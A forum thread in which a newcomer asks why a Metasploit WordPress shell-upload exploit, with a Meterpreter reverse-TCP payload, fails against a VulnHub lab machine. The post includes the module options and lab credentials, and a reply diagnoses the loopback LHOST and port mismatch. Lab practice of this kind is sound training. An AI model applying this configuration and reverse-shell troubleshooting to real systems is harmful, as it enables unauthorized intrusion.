Home Forums is there a way to make metasploit not remove temporary files after en exploit?

This topic contains 1 reply, has 2 voices, and was last updated by  dont_ban_me_bruh 1 month, 3 weeks ago.

  • Author
    Posts
  • #415720

    Public_Beach
    Member

    I’m kind of knew so please have some mercy

    I am trying to use a metasploit exploit on a machine from vulnhub

    (here’s the link [https://www.vulnhub.com/entry/noobbox-1,664/](https://www.vulnhub.com/entry/noobbox-1,664/))

    and I keep getting the same error message and can’t figure out how to fix it.

    here is the message

    ***

    [!] You are binding to a loopback address by setting LHOST to [127.0.0.1](https://127.0.0.1/). Did you want ReverseListenerBindAddress?

    [*] Started reverse TCP handler on [127.0.0.1:4444](https://127.0.0.1:4444/)

    [*] Authenticating with WordPress using noobbox:5p4c3…

    [+] Authenticated with WordPress

    [*] Preparing payload…

    [*] Uploading payload…

    [*] Executing the payload at /wordpress/wp-content/plugins/RltCwMtplH/cUGXwbOAsA.php…

    [!] This exploit may require manual cleanup of ‘cUGXwbOAsA.php’ on the target

    [!] This exploit may require manual cleanup of ‘RltCwMtplH.php’ on the target

    [!] This exploit may require manual cleanup of ‘../RltCwMtplH’ on the target

    [*] Exploit completed, but no session was created.

    ***

    and here are the options

    ***

    Module options (exploit/unix/webapp/wp_admin_shell_upload):

    Name Current Setting Required Description

    —- ————— ——– ———–

    PASSWORD 5p4c3 yes The WordPress password to authenticate with

    Proxies no A proxy chain of format type:host:port[,type:host:port][…]

    RHOSTS [182.66.1.120](https://182.66.1.120/)yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

    RPORT 80 yes The target port (TCP)

    SSL false no Negotiate SSL/TLS for outgoing connections

    TARGETURI /wordpress/ yes The base path to the wordpress application

    USERNAME noobbox yes The WordPress username to authenticate with

    VHOST no HTTP server virtual host

    Payload options (php/meterpreter/reverse_tcp):

    Name Current Setting Required Description

    —- ————— ——– ———–

    LHOST [127.0.0.1](https://127.0.0.1/)yes The listen address (an interface may be specified)

    LPORT 1234 yes The listen port

    Exploit target:

    Id Name

    — —-

    0 WordPress

    ***

    I looked at it and searched online and it comes out that what it’s saying is that it is not able to remove temporary files that it put there during the exploit, and so it won’t finish the exploit. is there a way that I con make not remove the temporary files?

  • #415721

    dont_ban_me_bruh

    I don’t think that’s your issue. It’s thinking it’s successfully uploaded the php shells, but it’s not getting a connection back. That is probably because you’re setting LHOST to loopback instead of your own IP.

    Also, you have mismatch in your LPORT settings: 4444 vs 1234.

    Even if the webserver is running on your local machine, it is probably bound to your non-loopback ip (182.66.1.120, in your case). That would make it impossible for it to talk to 127.0.0.1 under almost all circumstances.

    If you’re on a NAT’ed IP (i.e. the target is not on your local network with you), you’ll need to set up port forwarding before the reverse shell can reach your machine.

You must be logged in to reply to this topic.